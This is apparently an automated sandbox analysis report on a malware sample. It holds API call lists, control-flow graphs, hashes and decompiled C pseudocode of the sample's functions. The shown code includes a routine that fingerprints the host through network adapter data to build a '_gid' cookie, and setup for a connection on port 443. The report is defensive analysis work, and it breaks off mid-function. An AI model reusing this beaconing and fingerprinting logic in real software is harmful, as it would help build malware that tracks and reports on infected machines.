                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 001474F3
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 00147511
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014752F
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014754D
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 0014756B
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 00147589
                                                                                                                                                                                                                                                                  • Part of subcall function 0014745F: DeleteObject.GDI32(00000000), ref: 001475A7
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: GetSystemMetrics.USER32(00000031), ref: 00147100
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: GetSystemMetrics.USER32(00000032), ref: 0014710E
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: SetRectEmpty.USER32(00289F9C), ref: 00147121
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: EnumDisplayMonitors.USER32(00000000,00000000,00146F86,00289F9C), ref: 00147131
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: SystemParametersInfoW.USER32(00000030,00000000,00289F9C,00000000), ref: 00147140
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: SystemParametersInfoW.USER32(00001002,00000000,00289FC0,00000000), ref: 0014716D
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: SystemParametersInfoW.USER32(00001012,00000000,00289FC4,00000000), ref: 00147181
                                                                                                                                                                                                                                                                  • Part of subcall function 001470F2: SystemParametersInfoW.USER32(0000100A,00000000,00289FD4,00000000), ref: 001471A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$ConditionMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1890856596-0
                                                                                                                                                                                                                                                                • Opcode ID: 6136cea3a1162b5ff4e53f175a75a6cbdaab76b754c9d4025c533c7621b89239
                                                                                                                                                                                                                                                                • Instruction ID: 65de4ea97668bddf28633e736fa0766a13be9dacf7385398a8b95b4fa96ffbd0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6136cea3a1162b5ff4e53f175a75a6cbdaab76b754c9d4025c533c7621b89239
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1811A3B0A00218ABD725AF75EC4AFEFB7BCEB89700F00445DF64697281DBB04A448F90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 762 112f27-112f77 763 112f96-112fb8 762->763 764 112f79-112f7c 762->764 765 112fe4-113004 GetModuleFileNameW 763->765 766 112fba-112fde 763->766 764->763 767 112f7e-112f84 764->767 768 113006-113017 765->768 769 113019 765->769 766->765 770 112f86-112f89 767->770 771 112f8b-112f8e 767->771 773 11301f-113026 768->773 769->773 772 112f90 770->772 771->772 772->763 774 11302b-11303e 773->774 775 113040-113049 774->775 776 11304b-1130b8 VirtualProtect call 112e69 774->776 775->774 775->776 779 1130e8-11310a 776->779 780 1130ba-1130e6 776->780 781 113110-11312d 779->781 780->781
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,002A2E80,00000469), ref: 00112FF0
                                                                                                                                                                                                                                                                • VirtualProtect.KERNELBASE(00002100,00000040,0028F660), ref: 00113078
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileModuleNameProtectVirtual
                                                                                                                                                                                                                                                                • String ID: -
                                                                                                                                                                                                                                                                • API String ID: 2744891222-879422539
                                                                                                                                                                                                                                                                • Opcode ID: 5a9ff88032a6544f5b7a07fdf2ea6dc54a300e9c4792e4ae5c1db1a581449a34
                                                                                                                                                                                                                                                                • Instruction ID: 9b05f4a448642d7419760f0e7e6a2e2df09dcd47a8f782c50f1039cfb966764c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a9ff88032a6544f5b7a07fdf2ea6dc54a300e9c4792e4ae5c1db1a581449a34
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0B51D53A50A1909BD30DDB39BDAE2F17FE4D726B15B04006EF4C0873A2D168879AE711
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 782 118c1c-118c2e call 24972f 785 118c30 call 118704 782->785 786 118c35-118c38 782->786 785->786 788 118c3a-118c41 786->788 789 118c6d-118c7e call 118cbe 786->789 791 118c60-118c62 call 118a16 788->791 792 118c43-118c5e call 11890b 788->792 796 118c80-118c96 call 2496f2 call 118d79 789->796 797 118c9b-118ca2 call 2496f8 789->797 799 118c67-118c6b 791->799 792->785 792->791 796->797 799->785 799->789
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Exception@8H_prolog3Throw
                                                                                                                                                                                                                                                                • String ID: z($z(
                                                                                                                                                                                                                                                                • API String ID: 3670251406-2249586295
                                                                                                                                                                                                                                                                • Opcode ID: bb719ec3cebfba113984461a303682d72f460f32d76a7d5d339df6d31f1d1c93
                                                                                                                                                                                                                                                                • Instruction ID: dc06b4a80ab3ddb213f239ba264ad0af754e76af3b453759c1c4e3d93d92c8f7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb719ec3cebfba113984461a303682d72f460f32d76a7d5d339df6d31f1d1c93
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F20184396226059BCB2CAF64D8557E976A6AF60394F20803CE5519B290DF30CDC1CB90
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 806 d216d-d21bd wsprintfW 807 d21bf-d21c9 806->807 808 d21cb-d21ce 806->808 809 d21d1-d21ec call d14ec 807->809 808->809 812 d21ee-d21f1 809->812 813 d21f3-d21f5 809->813 814 d2211-d2217 812->814 815 d220b-d220f 813->815 816 d21f7-d21f9 813->816 815->814 816->815 817 d21fb-d2205 GetProcessHeap RtlFreeHeap 816->817 817->815
                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                			E000D216D(intOrPtr __edx, intOrPtr _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                                                				long _v16;
                                                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                                				short _v28;
                                                                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                                                                				char _v40;
                                                                                                                                                                                                                                                                				short _v168;
                                                                                                                                                                                                                                                                				void* __ecx;
                                                                                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                                                                                				void* _t30;
                                                                                                                                                                                                                                                                				intOrPtr* _t35;
                                                                                                                                                                                                                                                                				intOrPtr _t36;
                                                                                                                                                                                                                                                                				void** _t37;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t36 = __edx;
                                                                                                                                                                                                                                                                				wsprintfW( &_v168, 0xd4634, _t30);
                                                                                                                                                                                                                                                                				_v36 = _t36;
                                                                                                                                                                                                                                                                				_v40 =  &_v168;
                                                                                                                                                                                                                                                                				_v32 = 0;
                                                                                                                                                                                                                                                                				_v28 = 0x1bb;
                                                                                                                                                                                                                                                                				_t22 = _a4;
                                                                                                                                                                                                                                                                				_v24 = 1;
                                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                                                				if(_t22 == 0) {
                                                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                                                					_v12 = 0;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					_v8 = 0x30;
                                                                                                                                                                                                                                                                					_v12 = _t22;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t37 = _a8;
                                                                                                                                                                                                                                                                				_t35 = _a12;
                                                                                                                                                                                                                                                                				 *_t37 = 0;
                                                                                                                                                                                                                                                                				 *_t35 = 0;
                                                                                                                                                                                                                                                                				if(E000D14EC( &_v40, _t37, _t35) != 0xc8) {
                                                                                                                                                                                                                                                                					if( *_t37 != 0 &&  *_t35 != 0) {
                                                                                                                                                                                                                                                                						RtlFreeHeap(GetProcessHeap(), 0,  *_t37); // executed
                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                					 *_t37 = 0;
                                                                                                                                                                                                                                                                					 *_t35 = 0;
                                                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                					return 1;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                                0x000d2180
                                                                                                                                                                                                                                                                0x000d2188
                                                                                                                                                                                                                                                                0x000d2194
                                                                                                                                                                                                                                                                0x000d2197
                                                                                                                                                                                                                                                                0x000d21a1
                                                                                                                                                                                                                                                                0x000d21a4
                                                                                                                                                                                                                                                                0x000d21ab
                                                                                                                                                                                                                                                                0x000d21ae
                                                                                                                                                                                                                                                                0x000d21b5
                                                                                                                                                                                                                                                                0x000d21b8
                                                                                                                                                                                                                                                                0x000d21bd
                                                                                                                                                                                                                                                                0x000d21cb
                                                                                                                                                                                                                                                                0x000d21ce
                                                                                                                                                                                                                                                                0x000d21bf
                                                                                                                                                                                                                                                                0x000d21bf
                                                                                                                                                                                                                                                                0x000d21c6
                                                                                                                                                                                                                                                                0x000d21c6
                                                                                                                                                                                                                                                                0x000d21d1
                                                                                                                                                                                                                                                                0x000d21d7
                                                                                                                                                                                                                                                                0x000d21dd
                                                                                                                                                                                                                                                                0x000d21df
                                                                                                                                                                                                                                                                0x000d21ec
                                                                                                                                                                                                                                                                0x000d21f5
                                                                                                                                                                                                                                                                0x000d2205
                                                                                                                                                                                                                                                                0x000d2205
                                                                                                                                                                                                                                                                0x000d220b
                                                                                                                                                                                                                                                                0x000d220f
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d21ee
                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                0x000d21f0

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 000D2188
                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 000D21FE
                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000), ref: 000D2205
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Heap$FreeProcesswsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 617260705-0
                                                                                                                                                                                                                                                                • Opcode ID: f73bb150b0d3730ecba67fa0bb79b73dc9fea27eab891844bfd4dfff17de4bd0
                                                                                                                                                                                                                                                                • Instruction ID: 9765d2e839c0c5077732cd3262e757037fe433dd6f7fc83021dc3a56cc0987c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f73bb150b0d3730ecba67fa0bb79b73dc9fea27eab891844bfd4dfff17de4bd0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9212C7590130AAFDB208F95C98459EFBF8FF59310F20446EE989A3300D3748A45CBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 818 d13d3 call d12f9 820 d13d8-d13da ExitProcess 818->820
                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                			_entry_() {
                                                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                                                				void* _t3;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				E000D12F9(_t2, _t3); // executed
                                                                                                                                                                                                                                                                				ExitProcess(0);
                                                                                                                                                                                                                                                                			}





                                                                                                                                                                                                                                                                0x000d13d3
                                                                                                                                                                                                                                                                0x000d13da

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d0000_sample4.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: 72a0fa4d59ccd06826519b29c3e4db74ecaa906e3bcce2c533f7ae327f148f6c
                                                                                                                                                                                                                                                                • Instruction ID: 080c1795c6e2273de0c0b223f7e761cd257d9cca83dedd1a75cdafd44742822b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72a0fa4d59ccd06826519b29c3e4db74ecaa906e3bcce2c533f7ae327f148f6c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9490023414520167E5402761590A7982A245B00702F000002B709A55934D7900114571
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 013003DF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.568355205.0000000001300000.00000040.00000001.sdmp, Offset: 01300000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1300000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                • Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                                                                                                                • Instruction ID: beff9b76e323ed4c692bafdf9a92360b2230dac477543b58950e867f5bac8917
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05012873A001086BF72B8A0CDD01B7B77D8EFC47A8F19C165F916EB2C2C670D80145A4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0025B095
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: b5cc965574531a38da82e62e5c964f7ddff0bacc34e60ed516740bfb50cc9259
                                                                                                                                                                                                                                                                • Instruction ID: 8cbfaebe298cb4ca62b9bf11414534abaf268a42e8956053f3f221c27f3210cb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5cc965574531a38da82e62e5c964f7ddff0bacc34e60ed516740bfb50cc9259
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DF05431631226AADF335E629C06B5B7758AF82772F284562BC24961D0CB70D87886A9
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,0024A489,?), ref: 0025AFDE
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                • Opcode ID: d796fc83781c58054635c4a6631442d430caf9defa7c05e621c7a39c329c791b
                                                                                                                                                                                                                                                                • Instruction ID: a04b13e1eef924ed13b1d3f64e6bc66cdfa617bcffa861b5f9e890ca7e2d3fce
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d796fc83781c58054635c4a6631442d430caf9defa7c05e621c7a39c329c791b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A1E0E5711342136BD6213E61AC07F5A364CAB913B3F140321EC09969C0CFB2CC3886AF
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 00118BCD
                                                                                                                                                                                                                                                                  • Part of subcall function 0011A845: RtlEnterCriticalSection.NTDLL(00287CD8), ref: 0011A876
                                                                                                                                                                                                                                                                  • Part of subcall function 0011A845: RtlInitializeCriticalSection.NTDLL(00000000), ref: 0011A88C
                                                                                                                                                                                                                                                                  • Part of subcall function 0011A845: RtlLeaveCriticalSection.NTDLL(00287CD8), ref: 0011A89A
                                                                                                                                                                                                                                                                  • Part of subcall function 0011A845: RtlEnterCriticalSection.NTDLL(00000000), ref: 0011A8A7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1641187343-0
                                                                                                                                                                                                                                                                • Opcode ID: 7d510c0f255cb8e420b91064042722c2327507ffcf9970cd9f230f8edc7bfe74
                                                                                                                                                                                                                                                                • Instruction ID: aae1ec1fc52412aa5fe53dc98eb437672fe9d820c786de9d5e513a761b393fdb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d510c0f255cb8e420b91064042722c2327507ffcf9970cd9f230f8edc7bfe74
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCE01A7452120ADFEB48BBB0C4467CDBB60AF21321F208139E4515A2C5DFB149E29F22
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 00146F7C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InfoParametersSystem
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3098949447-0
                                                                                                                                                                                                                                                                • Opcode ID: 33c9a9e6e13297bb4b491eb8bbf3d49f6fa0bddd6e2d69b5a119c10cf44cdd2d
                                                                                                                                                                                                                                                                • Instruction ID: 27d346793e18b3be9f0468977f981aed2c7f5233fc71232dc35b11f6f3689ecc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33c9a9e6e13297bb4b491eb8bbf3d49f6fa0bddd6e2d69b5a119c10cf44cdd2d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6BD0C970140204AFE7019F40EC09BA237B8AB56705F504064F6088E1B0CBB668108BA5
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00127F71
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DeleteObject
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1531683806-0
                                                                                                                                                                                                                                                                • Opcode ID: e778ad974f3409eacef5f0ccbd56568dee166afa521725abc842ff07c056f8d9
                                                                                                                                                                                                                                                                • Instruction ID: bcc09183509905c4c03bd8414b68d9c125aca9cc10053e33dfa493764eda8a92
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e778ad974f3409eacef5f0ccbd56568dee166afa521725abc842ff07c056f8d9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23B092B0A0D110AFCF006730AB0C32776545BA130AF209894A02881181EB79C4968510
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D4740), ref: 001313E0
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D4778), ref: 001313F0
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D47A8), ref: 00131400
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D47D0), ref: 00131410
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D47F0), ref: 00131420
                                                                                                                                                                                                                                                                • RegisterClipboardFormatW.USER32(000D480C), ref: 00131430
                                                                                                                                                                                                                                                                  • Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00131570
                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32(00000114), ref: 001315F8
                                                                                                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00131758
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClipboardFormatRegister$Exception@8H_prolog3_ThrowVersion_wcschr
                                                                                                                                                                                                                                                                • String ID: ${($@$|J
                                                                                                                                                                                                                                                                • API String ID: 3021367414-4130230330
                                                                                                                                                                                                                                                                • Opcode ID: 5ee366d988156fb60b7b96f632e17c45f764086cd5b2b8087591cdd837c95d23
                                                                                                                                                                                                                                                                • Instruction ID: 8b6ecf7abc6cc78646b81d5217120905507098a467e7667cba85ad5473e0c72d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ee366d988156fb60b7b96f632e17c45f764086cd5b2b8087591cdd837c95d23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED1D174B00315AFCB18DF24D885BEAB7B4BF49310F05416AF95A97381DB74A894CFA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                C-Code - Quality: 66%
                                                                                                                                                                                                                                                                			E000D1ECF(void* __ecx) {
                                                                                                                                                                                                                                                                				CHAR* _v8;
                                                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                                                                                                                                				char _t23;
                                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                                                				CHAR* _t49;
                                                                                                                                                                                                                                                                				intOrPtr* _t51;
                                                                                                                                                                                                                                                                				long _t52;
                                                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                				_t37 = 0;
                                                                                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                                                                                				_v16 = _v16 & 0;
                                                                                                                                                                                                                                                                				_v8 = L"; _gid=";
                                                                                                                                                                                                                                                                				_t51 = GetProcAddress(LoadLibraryA("IPHLPAPI.DLL"), "GetAdaptersInfo");
                                                                                                                                                                                                                                                                				if(_t51 == 0) {
                                                                                                                                                                                                                                                                					L6:
                                                                                                                                                                                                                                                                					return E000D1BD5(_v12, L"; _gid=", 0xd4610, 1);
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_push( &_v16);
                                                                                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                                                                                				if( *_t51() != 0x6f) {
                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t23 = _v24;
                                                                                                                                                                                                                                                                				if(_t23 == 0) {
                                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                				_t48 = HeapAlloc(GetProcessHeap(), 8, _t23 + 1);
